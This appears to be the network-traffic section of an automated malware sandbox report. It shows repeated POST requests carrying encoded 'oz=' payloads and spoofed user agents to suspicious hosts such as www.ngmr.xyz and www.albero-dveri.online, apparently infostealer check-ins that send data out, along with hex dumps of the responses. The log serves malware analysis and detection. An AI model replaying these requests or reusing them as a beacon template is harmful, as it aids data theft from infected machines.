                                                                                                                                              Oct 4, 2024 08:11:55.831748962 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                                                                              Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                                                              Oct 4, 2024 08:11:55.831762075 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                                                              Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                                                              Oct 4, 2024 08:11:55.831851959 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                                                              Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                                                              Oct 4, 2024 08:11:55.831904888 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                                                              Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                                                              Oct 4, 2024 08:11:55.831959009 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                                              Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              74192.168.11.204980454.67.87.11080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:01.004034996 CEST795OUTPOST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
                                                                                                                                              Oct 4, 2024 08:12:01.158198118 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:49 GMT
                                                                                                                                              X-Varnish: 1110524998
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              75192.168.11.204980554.67.87.11080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:03.689009905 CEST815OUTPOST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
                                                                                                                                              Oct 4, 2024 08:12:03.843426943 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:52 GMT
                                                                                                                                              X-Varnish: 1110525052
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              76192.168.11.204980654.67.87.11080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:06.376060009 CEST1289OUTPOST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 78 39 33 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/sVavjvzYt0wi3n41OrA6nAK+Np+wAfAx93u5MbdkFr5VbJmcTeWor6g1Gou+SXSQIkt/8m+KYxgFAuJpcEp+pl+9F4xC7SBpfDgmyJqfy6y9pRB02xBS6kgJnIOpAxSuxX6pFSWYS1XCzZNMtLId3Vkyz5KxoVnbwHbKB8FmGQj1fWHfuATFF+BAf+yWomXiOfWv+wcP1J7JwjH9a82waCvQxhijt+ZUM3xxPEzGPI3QzIZBZ7f45DbzmE6DQnRRQBODQaBxvVA46RfsojREeyaYEdFsL90keHRf8hLqgoJzXY3RXTNN/yv1Gf95U+wUH/eKLrGV3z6ja0bZSGnIaoyNsfHIYlNvaUWPca5qh0J2EY5lGSTkhnOCt7mkdUUO+E0m
                                                                                                                                              Oct 4, 2024 08:12:06.376108885 CEST3867OUTData Raw: 36 62 46 6b 64 64 38 32 31 54 74 74 33 4b 37 72 75 45 42 4e 4b 56 76 58 55 61 41 53 44 41 58 70 53 4c 31 55 34 52 59 69 2f 33 6d 38 66 4b 2b 70 37 52 2f 6c 39 78 4a 49 43 64 6b 71 31 68 31 4e 4e 7a 35 41 57 33 54 4d 2b 51 59 52 54 32 4b 79 30 6e
                                                                                                                                              Data Ascii: 6bFkdd821Ttt3K7ruEBNKVvXUaASDAXpSL1U4RYi/3m8fK+p7R/l9xJICdkq1h1NNz5AW3TM+QYRT2Ky0nSq1jIs1a2ml/3x2h0ch8HUw+0vvJ6FwW1ISvdTyUK8JHqBuVXE8hcDIY54rTxfccaRYyyBbI59ec3Kwvd+2UmgldEua9dfIQn/pZumElQei9JlFoJj5xlaAer1tJXSXbzBXVHZl5q7gtk1ptbXv3BBSxm9rpJctyj
                                                                                                                                              Oct 4, 2024 08:12:06.376157999 CEST2808OUTData Raw: 2b 53 55 73 4b 5a 42 59 38 46 34 6f 33 51 78 2f 34 72 64 55 75 62 38 55 49 51 35 41 58 48 66 7a 46 38 55 57 48 61 45 67 47 32 62 34 66 61 45 45 32 70 63 56 63 4c 65 31 62 73 57 6a 34 45 38 6e 73 62 35 65 65 31 6f 76 6e 57 4e 54 4f 52 75 55 36 6b
                                                                                                                                              Data Ascii: +SUsKZBY8F4o3Qx/4rdUub8UIQ5AXHfzF8UWHaEgG2b4faEE2pcVcLe1bsWj4E8nsb5ee1ovnWNTORuU6kUnXycoGr0REY+5eq3aELCZIw29uHr+PlLx7aUJ0fBQ8M+PmaE+x6aXiQ1t5X8Br1wMaXypRDwVibJv84OM6oid5R7fqvZIZnZlWUsqdkdZHF2r5y/D0sjk6TQHvR0XH5ag5wpdd/6iDfToJgtTq7iZokhVNUw3KV5
                                                                                                                                              Oct 4, 2024 08:12:06.530628920 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:54 GMT
                                                                                                                                              X-Varnish: 1110525113
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              77192.168.11.204980754.67.87.11080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:09.061167955 CEST543OUTGET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:12:09.216747999 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:57 GMT
                                                                                                                                              X-Varnish: 1110525150
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              78192.168.11.2049808194.58.112.17480
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:14.472788095 CEST828OUTPOST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                                                                              Oct 4, 2024 08:12:14.709954023 CEST1289INData Raw: 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f f9 12 2e f2 38 f9 3c fe 4e e4 14 7b 37 f9 5c c7 4c 2a ae 5b a0 d1 14 cf 1c c2 46 79 ba 5b 60 88 0d 25 a3 51 a0 74 f6 37 59 5d 46 3e ad ac de 70 60 47 d2 fb 02
                                                                                                                                              Data Ascii: #Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hnt>iPZ?5fH>a-/CKwP7&k0Z
                                                                                                                                              Oct 4, 2024 08:12:14.709995985 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:14 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
